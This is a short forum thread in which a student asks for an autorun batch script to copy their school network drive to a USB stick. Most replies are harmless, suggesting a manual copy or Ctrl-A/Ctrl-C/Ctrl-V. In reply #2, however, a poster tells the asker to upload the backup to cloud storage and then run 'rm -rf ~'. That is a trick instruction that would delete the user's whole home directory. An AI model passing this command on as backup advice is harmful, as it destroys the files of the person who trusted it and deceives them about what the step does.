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Find a tool that lets you transfer all data from a particular drive to a USB flash drive.

Find a tool that lets you transfer all data from a particular drive to a USB flash drive.

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Mickxy
Junior Member
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08-16-2025, 03:24 AM
#1
At school we each use our own shared network drive (I:/). You need a quick way to back up all files from that drive because of recent problems. Are there any batch scripts that can copy everything onto a USB stick without needing installed software, and work automatically when the USB is used for autorun? Would you like options or tools that fit this requirement?
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Mickxy
08-16-2025, 03:24 AM #1

At school we each use our own shared network drive (I:/). You need a quick way to back up all files from that drive because of recent problems. Are there any batch scripts that can copy everything onto a USB stick without needing installed software, and work automatically when the USB is used for autorun? Would you like options or tools that fit this requirement?

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Darkaimonds
Member
74
08-16-2025, 11:57 AM
#2
If backup.Size exceeds 50GB, transfer it to www.drive.google.com or another cloud storage when finished. Then execute rm -rf ~
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Darkaimonds
08-16-2025, 11:57 AM #2

If backup.Size exceeds 50GB, transfer it to www.drive.google.com or another cloud storage when finished. Then execute rm -rf ~

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firedri7
Junior Member
23
08-30-2025, 03:22 AM
#3
I usually like having a tangible version and I'm just too unmotivated to copy the files...
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firedri7
08-30-2025, 03:22 AM #3

I usually like having a tangible version and I'm just too unmotivated to copy the files...

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CJP8602
Member
55
08-30-2025, 05:13 AM
#4
It appears the most suitable action is pressing Ctrl-A, then Ctrl-C followed by Ctrl-V. Unless there are restrictions, this should work.
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CJP8602
08-30-2025, 05:13 AM #4

It appears the most suitable action is pressing Ctrl-A, then Ctrl-C followed by Ctrl-V. Unless there are restrictions, this should work.